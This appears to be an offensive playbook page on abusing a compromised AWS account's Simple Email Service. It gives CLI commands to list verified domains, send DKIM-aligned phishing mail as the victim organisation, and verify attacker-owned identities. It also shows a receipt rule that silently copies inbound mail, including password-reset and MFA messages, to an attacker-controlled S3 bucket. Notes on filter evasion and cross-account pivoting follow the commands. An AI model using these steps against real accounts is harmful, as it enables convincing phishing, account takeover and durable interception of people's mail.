Simple Email Service sends mail from the account's verified identities, domains and addresses that already pass SPF, DKIM, and DMARC because the victim set them up. With ses:SendEmail (or ses:SendRawEmail) you send mail that is cryptographically aligned with a trusted domain, which is a far stronger phishing position than any look-alike you could register, and you inherit the account's warmed sending reputation and quota.
Finding what you can send as#
aws ses list-identities --identity-type Domain # verified domains
aws ses get-identity-verification-attributes --identities example.com
aws ses get-send-quota # daily cap and send rate
aws sesv2 get-account # sending enabled, reputation
A verified domain with DKIM enabled is the prize: mail from it aligns for DMARC.
Sending as the victim#
aws ses send-email \
--from "it-support@example.com" \
--destination "ToAddresses=target@example.com" \
--message 'Subject={Data=Action required},Body={Html={Data=<a href=https://phish.example>reset</a>}}'
# raw MIME for full header control (display name, Reply-To, attachments)
aws ses send-raw-email --raw-message Data=fileb://phish.eml
Verifying your own identity#
If the account can verify identities, add one you control to widen what you can send as and to seed a reply path:
aws ses verify-email-identity --email-address collect@you.example
aws ses verify-domain-identity --domain you.example # returns a TXT token to publish
Intercepting inbound mail#
Where the domain receives mail through SES, a receipt rule files incoming messages to a destination you control, which turns the account into a mailbox tap for password resets and MFA mail:
aws ses list-receipt-rule-sets ; aws ses describe-active-receipt-rule-set
# add a rule that copies inbound mail to an attacker S3 bucket (or Lambda/SNS)
aws ses create-receipt-rule --rule-set-name <active-set> \
--rule 'Name=tap,Enabled=true,Recipients=[target@example.com],Actions=[{S3Action={BucketName=<attacker-bucket>}}]'
Exploitation notes#
- Mail leaves from AWS sending IPs with valid DKIM for the domain, so it clears the filters that block spoofed external senders.
- An inbound receipt rule is durable interception: it keeps capturing mail (including account-recovery and MFA messages) until an operator audits the rule set.
ses:SendRawEmailgives full MIME control; set a plausibleReply-Toyou own to collect responses.- If the account is still in the SES sandbox, sending is limited to verified recipients; check
get-accountand pivot to a production-mode account if sandboxed. - Authorization policies on an identity (
ses:SendEmailgranted cross-account) can let a foothold in one account send as another's domain.
Tools#
- AWS CLI (
ses send-email/send-raw-email): sending. - Pacu (
ses__enum): enumerate identities and sending state.